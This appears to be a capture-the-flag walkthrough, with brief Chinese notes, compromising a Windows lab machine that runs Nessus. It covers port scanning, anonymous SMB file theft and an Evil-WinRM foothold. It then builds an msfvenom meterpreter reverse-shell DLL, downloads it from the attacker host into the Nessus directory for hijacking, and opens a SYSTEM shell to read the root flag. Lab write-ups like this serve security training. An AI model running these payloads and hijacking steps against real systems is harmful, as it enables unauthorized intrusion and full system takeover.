3 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 2.242 seconds (114.18 hosts/sec). 3 responded ┌──(root㉿kali)-[~] └─# nmap -sV -sC -p- 192.168.56.156 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-22 08:01 EDT Nmap scan report for 192.168.56.156 Host is up (0.00057s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 8834/tcp open ssl/nessus-xmlrpc? | ssl-cert: Subject: commonName=WIN-C05BOCC7F0H/organizationName=Nessus Users United/stateOrProvinceName=NY/countryName=US | Not valid before: 2024-10-18T17:36:17 |_Not valid after: 2028-10-17T17:36:17 |_ssl-date: TLS randomness does not represent time | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Cache-Control: must-revalidate | X-Frame-Options: DENY | Content-Type: text/html | ETag: fc785d9fb222132265fb83f9adb1608e | Connection: close | X-XSS-Protection: 1; mode=block | Server: NessusWWW | Date: Wed, 23 Jul 2025 03:02:58 GMT | X-Content-Type-Options: nosniff | Content-Length: 1217 | Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action 'self'; frame-ancestors 'none'; frame-src https://store.tenable.com; default-src 'self'; connect-src 'self' www.tenable.com; script-src 'self' www.tenable.com; img-src 'self' data:; style-src 'self' www.tenable.com; object-src 'none'; base-uri 'self'; | Strict-Transport-Security: max-age=31536000 | Expect-CT: max-age=0 | <!doctype html> | <html lang="en"> | <head> | <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> |_ <meta http-equiv="Content-Security-Policy" content="upgrade-inse 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8834-TCP:V=7.94SVN%T=SSL%I=7%D=7/22%Time=687F7DF3%P=x86_64-pc-linux SF:-gnu%r(GetRequest,788,"HTTP/1\.1\x20200\x20OK\r\nCache-Control:\x20must SF:-revalidate\r\nX-Frame-Options:\x20DENY\r\nContent-Type:\x20text/html\r SF:\nETag:\x20fc785d9fb222132265fb83f9adb1608e\r\nConnection:\x20close\r\n SF:X-XSS-Protection:\x201;\x20mode=block\r\nServer:\x20NessusWWW\r\nDate:\ SF:x20Wed,\x2023\x20Jul\x202025\x2003:02:58\x20GMT\r\nX-Content-Type-Optio SF:ns:\x20nosniff\r\nContent-Length:\x201217\r\nContent-Security-Policy:\x SF:20upgrade-insecure-requests;\x20block-all-mixed-content;\x20form-action SF:\x20'self';\x20frame-ancestors\x20'none';\x20frame-src\x20https://store SF:\.tenable\.com;\x20default-src\x20'self';\x20connect-src\x20'self'\x20w SF:ww\.tenable\.com;\x20script-src\x20'self'\x20www\.tenable\.com;\x20img- SF:src\x20'self'\x20data:;\x20style-src\x20'self'\x20www\.tenable\.com;\x2 SF:0object-src\x20'none';\x20base-uri\x20'self';\r\nStrict-Transport-Secur SF:ity:\x20max-age=31536000\r\nExpect-CT:\x20max-age=0\r\n\r\n<!doctype\x2 SF:0html>\n<html\x20lang=\"en\">\n\x20\x20\x20\x20<head>\n\x20\x20\x20\x20 SF:\x20\x20\x20\x20<meta\x20http-equiv=\"X-UA-Compatible\"\x20content=\"IE SF:=edge,chrome=1\"\x20/>\n\x20\x20\x20\x20\x20\x20\x20\x20<meta\x20http-e SF:quiv=\"Content-Security-Policy\"\x20content=\"upgrade-inse"); MAC Address: 08:00:27:C0:51:50 (Oracle VirtualBox virtual NIC) Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 175.58 seconds
有一个登陆页面https访问
扫目录的时候加上参数-k告诉它忽略 SSL/TLS 证书的验证错误。
gobuster dir -u https://192.168.56.156:8834 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html,.txt,.xml -k
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share Documents Disk IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 192.168.56.156 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌──(root㉿kali)-[~] └─# smbclient \\\\192.168.56.156\\Documents -N Try "help" to get a list of possible commands. smb: \> dir . DR 0 Fri Oct 18 20:42:53 2024 .. D 0 Sat Oct 19 01:08:23 2024 desktop.ini AHS 402 Sat Jun 15 13:54:33 2024 My Basic Network Scan_hwhm7q.pdf A 122006 Fri Oct 18 18:19:59 2024 My Music DHSrn 0 Sat Jun 15 13:54:27 2024 My Pictures DHSrn 0 Sat Jun 15 13:54:27 2024 My Videos DHSrn 0 Sat Jun 15 13:54:27 2024 Web Application Tests_f6jg9t.pdf A 136025 Fri Oct 18 18:20:14 2024
12942591 blocks of size 4096. 10994381 blocks available
可以直接匿名访问
smb: \> mget * Get file desktop.ini? y getting file \desktop.ini of size 402 as desktop.ini (23.1 KiloBytes/sec) (average 23.1 KiloBytes/sec) Get file My Basic Network Scan_hwhm7q.pdf? y getting file \My Basic Network Scan_hwhm7q.pdf of size 122006 as My Basic Network Scan_hwhm7q.pdf (2382.9 KiloBytes/sec) (average 1784.2 KiloBytes/sec) Get file Web Application Tests_f6jg9t.pdf? y getting file \Web Application Tests_f6jg9t.pdf of size 136025 as Web Application Tests_f6jg9t.pdf (2711.0 KiloBytes/sec) (average 2175.7 KiloBytes/sec) smb: \>
两个pdf是nessus的扫描报告
但是作者说过不打cve我们看一下pdf有什么隐藏信息
使用exiftool来读取文件元信息
┌──(root㉿kali)-[/myift/bachang/win/nessus] └─# exiftool * ======== desktop.ini ExifTool Version Number : 12.76 File Name : desktop.ini Directory : . File Size : 402 bytes File Modification Date/Time : 2025:07:21 21:31:27-04:00 File Access Date/Time : 2025:07:21 21:32:50-04:00 File Inode Change Date/Time : 2025:07:21 21:31:27-04:00 File Permissions : -rw-r--r-- File Type : TXT File Type Extension : txt MIME Type : text/plain MIME Encoding : utf-16le Byte Order Mark : Yes Newlines : Windows CRLF ======== My Basic Network Scan_hwhm7q.pdf ExifTool Version Number : 12.76 File Name : My Basic Network Scan_hwhm7q.pdf Directory : . File Size : 122 kB File Modification Date/Time : 2025:07:21 21:31:29-04:00 File Access Date/Time : 2025:07:21 21:33:22-04:00 File Inode Change Date/Time : 2025:07:21 21:31:29-04:00 File Permissions : -rw-r--r-- File Type : PDF File Type Extension : pdf MIME Type : application/pdf Linearized : No Page Count : 5 Profile CMM Type : Little CMS Profile Version : 2.3.0 Profile Class : Display Device Profile Color Space Data : RGB Profile Connection Space : XYZ Profile Date Time : 2004:08:13 12:18:06 Profile File Signature : acsp Primary Platform : Microsoft Corporation CMM Flags : Not Embedded, Independent Device Manufacturer : Little CMS Device Model : Device Attributes : Reflective, Glossy, Positive, Color Rendering Intent : Perceptual Connection Space Illuminant : 0.9642 1 0.82491 Profile Creator : Little CMS Profile ID : 7fb30d688bf82d32a0e748daf3dba95d Device Mfg Desc : lcms generated Profile Description : sRGB Device Model Desc : sRGB Media White Point : 0.95015 1 1.08826 Red Matrix Column : 0.43585 0.22238 0.01392 Blue Matrix Column : 0.14302 0.06059 0.71384 Green Matrix Column : 0.38533 0.71704 0.09714 Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Chromaticity Channels : 3 Chromaticity Colorant : Unknown Chromaticity Channel 1 : 0.64 0.33 Chromaticity Channel 2 : 0.3 0.60001 Chromaticity Channel 3 : 0.14999 0.06 Profile Copyright : no copyright, use freely XMP Toolkit : Image::ExifTool 12.76 Date : 2024:10:18 15:10:05+02:00 Format : application/pdf Language : x-unknown Author : Jose PDF Version : 1.4 Producer : Apache FOP Version 2.8 Create Date : 2024:10:18 15:10:05+02:00 Creator Tool : Apache FOP Version 2.8 Metadata Date : 2024:10:18 15:10:05+02:00 Page Mode : UseOutlines Creator : Apache FOP Version 2.8 ======== Web Application Tests_f6jg9t.pdf ExifTool Version Number : 12.76 File Name : Web Application Tests_f6jg9t.pdf Directory : . File Size : 136 kB File Modification Date/Time : 2025:07:21 21:31:30-04:00 File Access Date/Time : 2025:07:21 21:33:23-04:00 File Inode Change Date/Time : 2025:07:21 21:31:30-04:00 File Permissions : -rw-r--r-- File Type : PDF File Type Extension : pdf MIME Type : application/pdf Linearized : No Page Count : 6 Profile CMM Type : Little CMS Profile Version : 2.3.0 Profile Class : Display Device Profile Color Space Data : RGB Profile Connection Space : XYZ Profile Date Time : 2004:08:13 12:18:06 Profile File Signature : acsp Primary Platform : Microsoft Corporation CMM Flags : Not Embedded, Independent Device Manufacturer : Little CMS Device Model : Device Attributes : Reflective, Glossy, Positive, Color Rendering Intent : Perceptual Connection Space Illuminant : 0.9642 1 0.82491 Profile Creator : Little CMS Profile ID : 7fb30d688bf82d32a0e748daf3dba95d Device Mfg Desc : lcms generated Profile Description : sRGB Device Model Desc : sRGB Media White Point : 0.95015 1 1.08826 Red Matrix Column : 0.43585 0.22238 0.01392 Blue Matrix Column : 0.14302 0.06059 0.71384 Green Matrix Column : 0.38533 0.71704 0.09714 Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract) Chromaticity Channels : 3 Chromaticity Colorant : Unknown Chromaticity Channel 1 : 0.64 0.33 Chromaticity Channel 2 : 0.3 0.60001 Chromaticity Channel 3 : 0.14999 0.06 Profile Copyright : no copyright, use freely XMP Toolkit : Image::ExifTool 12.76 Date : 2024:10:18 15:10:19+02:00 Format : application/pdf Language : x-unknown Author : Jose PDF Version : 1.4 Producer : Apache FOP Version 2.8 Create Date : 2024:10:18 15:10:19+02:00 Creator Tool : Apache FOP Version 2.8 Metadata Date : 2024:10:18 15:10:19+02:00 Page Mode : UseOutlines Creator : Apache FOP Version 2.8 3 image files read
Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\nesus\Documents> upload winPEAS.exe winPEAS.exe Info: Uploading /myift/peas/winPEAS.exe to C:\Users\nesus\Documents\winPEAS.exe Data: 13333844 bytes of 13333844 bytes copied Info: Upload successful!
*Evil-WinRM* PS C:\Users\nesus\Documents> .\winPEAS.exe [!] If you want to run the file analysis checks (search sensitive information in files), you need to specify the 'fileanalysis' or 'all' argument. Note that this search might take several minutes. For help, run winpeass.exe --help ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
┌──(root㉿kali)-[/myift/bachang/win/nessus] └─# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.103 LPORT=4445 -f dll -o version.dll [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 354 bytes Final size of dll file: 9216 bytes Saved as: version.dll
*Evil-WinRM* PS C:\Program Files\Tenable\Nessus> Invoke-WebRequest -Uri http://192.168.56.103:8888/version.dll -OutFile legacy.dll The process cannot access the file 'C:\Program Files\Tenable\Nessus\legacy.dll' because it is being used by another process. At line:1 char:1 + Invoke-WebRequest -Uri http://192.168.56.103:8888/version.dll -OutFil ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Invoke-WebRequest], IOException + FullyQualifiedErrorId : System.IO.IOException,Microsoft.PowerShell.Commands.InvokeWebRequestCommand *Evil-WinRM* PS C:\Program Files\Tenable\Nessus> ls
msf6 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp PAYLOAD => windows/x64/meterpreter/reverse_tcp msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.56.103:8081 [*] Sending stage (203846 bytes) to 192.168.56.156 [*] Meterpreter session 1 opened (192.168.56.103:8081 -> 192.168.56.156:49670) at 2025-07-22 22:29:48 -0400
meterpreter > shell Process 3580 created. Channel 1 created. Microsoft Windows [Version 10.0.20348.587] (c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami whoami nt authority\system
C:\Users\Administrator\Desktop>type root.txt type root.txt b5fc5a4ebfc20cc18220a814e1aee0aa
